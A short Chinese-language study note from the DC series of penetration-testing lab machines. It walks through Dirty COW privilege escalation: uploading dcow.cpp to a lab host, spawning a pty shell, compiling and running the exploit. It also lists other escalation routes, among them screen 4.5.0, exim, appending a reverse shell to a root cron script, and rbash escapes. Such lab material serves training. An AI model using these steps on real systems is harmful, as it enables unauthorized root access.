ETC|DC系列靶机知识点总结( 二 ) Python

4、100份src文档

5、常见安全面试题

6、ctf大赛经典题目解析

7、全套工具包

8、应急响应笔记
脏牛提权

upload /root/dcow.cpp 192.168.26.128 /tmp #上传exp到靶机的 /tmp目录下
shell
python -c ‘import pty;pty.spawn(\"/bin/bash\")’ #优化终端界面，便于操作
cd /tmp
chmod +x dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
##########################################
-Wall 一般使用该选项，允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别， -O0表示没有优化-O1为缺省值， ->O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时，需要链接pthread库
-o dcow gcc生成的目标文件名字为dcow
##########################################
./dcow #执行
第三方特定版本插件提权screen4.5.0、exim 4等
定时任务提权：如果定时任务是以root权限运行的，并且低权限用户可以修改定时任务的脚本，那么可以尝试追加或者改写定时任务的脚本来提权，例如在脚本后面追加一行反弹shell的命令来获取到root权限。
其他知识点：逃逸出rbash的一些方法